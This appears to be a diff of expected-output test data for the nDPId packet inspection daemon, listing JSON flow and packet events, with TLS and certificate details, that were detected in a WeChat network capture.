+00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1046,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167695488,"flow_last_seen":1492167695488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167695488,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1046,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1492167695488,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167695488,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8xuRAAEAGTljAqAFny82XotNmAbsIrs6CAAAAAKACchD7hQAAAgQFtAQCCAoAMghmAAAAAAEDAwc="} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1051,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1492167695562,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167695562,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG702WgJJlmRIM7\/KASN8ga\/wAAAgQFoAQCCApF0vJmADIIJwEDAwc="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1052,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1492167695562,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167695562,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0M91AAEAG4WfAqAFny82XotNlAbtEgzv8oCSZZ4AQAOWASQAAAQEICgAyCHhF0vJm"} +00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1053,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167695237,"flow_last_seen":1492167695562,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167695562,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1054,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1492167695854,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167695854,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG702aaLHzgCK7Og6ASN8jmSwAAAgQFoAQCCApF0vKlADIIZgEDAwc="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1055,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1492167695854,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167695854,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0xuVAAEAGTl\/AqAFny82XotNmAbsIrs6Dmix84YAQAOVLjAAAAQEICgAyCMFF0vKl"} +00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1057,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167695237,"flow_last_seen":1492167695891,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167695891,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1059,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167695237,"flow_last_seen":1492167695891,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167695891,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1070,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167695488,"flow_last_seen":1492167696636,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167696636,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1077,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167695488,"flow_last_seen":1492167697005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167697005,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1079,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167695488,"flow_last_seen":1492167697006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167697006,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1088,"source":"wechat.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1492167697384,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1492167697384,"pkt":"AQBeAAAWeJKcD6iOCABGwAAoAABAAAECQerAqAFn4AAAFpQEAAAiAPsCAAAAAQIAAADgAAD7"} 00693{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1112,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1492167338426,"flow_last_seen":1492167713329,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":1280,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167713329,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} 00702{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1113,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1492167338426,"flow_last_seen":1492167713329,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":1280,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167713329,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1127,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167720101,"flow_last_seen":1492167720101,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167720101,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1127,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1492167720101,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167720101,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8R8JAAEAGzXrAqAFny82XotNnAbsR+WetAAAAAKACchBBBgAAAgQFtAQCCAoAMiBvAAAAAAEDAwc="} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1128,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167720353,"flow_last_seen":1492167720353,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167720353,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1128,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1492167720353,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167720353,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8TqBAAEAGxpzAqAFny82XotNoAbuP9m4OAAAAAKACchC8ZwAAAgQFtAQCCAoAMiCuAAAAAAEDAwc="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1131,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1492167720458,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167720458,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG702cUBmdaEflnrqASN8gU+wAAAgQFoAQCCApFrqVHADIgbwEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1132,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1492167720458,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167720458,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0R8NAAEAGzYHAqAFny82XotNnAbsR+WeuFAZnW4AQAOV6PQAAAQEICgAyIMhFrqVH"} -00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1133,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167720101,"flow_last_seen":1492167720458,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167720458,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1135,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1492167720700,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167720700,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG702hvZooej\/ZuD6ASN8iscAAAAgQFoAQCCApF0wrqADIgrgEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1136,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1492167720700,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167720700,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0TqFAAEAGxqPAqAFny82XotNoAbuP9m4Pb2aKH4AQAOURtQAAAQEICgAyIQVF0wrq"} -00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1138,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167720101,"flow_last_seen":1492167720812,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167720812,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1140,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167720101,"flow_last_seen":1492167720812,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167720812,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1159,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167720353,"flow_last_seen":1492167722010,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167722010,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1166,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167720353,"flow_last_seen":1492167722364,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167722364,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01436{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1168,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167720353,"flow_last_seen":1492167722365,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1492167722365,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1196,"source":"wechat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167617247,"flow_last_seen":1492167617598,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167730051,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54109,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1196,"source":"wechat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167617247,"flow_last_seen":1492167617598,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167730051,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54109,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1196,"source":"wechat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167617247,"flow_last_seen":1492167617562,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167730051,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54110,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1196,"source":"wechat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167617247,"flow_last_seen":1492167617562,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167730051,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54110,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1127,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167720101,"flow_last_seen":1492167720101,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167720101,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1127,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1492167720101,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167720101,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8R8JAAEAGzXrAqAFny82XotNnAbsR+WetAAAAAKACchBBBgAAAgQFtAQCCAoAMiBvAAAAAAEDAwc="} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1128,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167720353,"flow_last_seen":1492167720353,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167720353,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 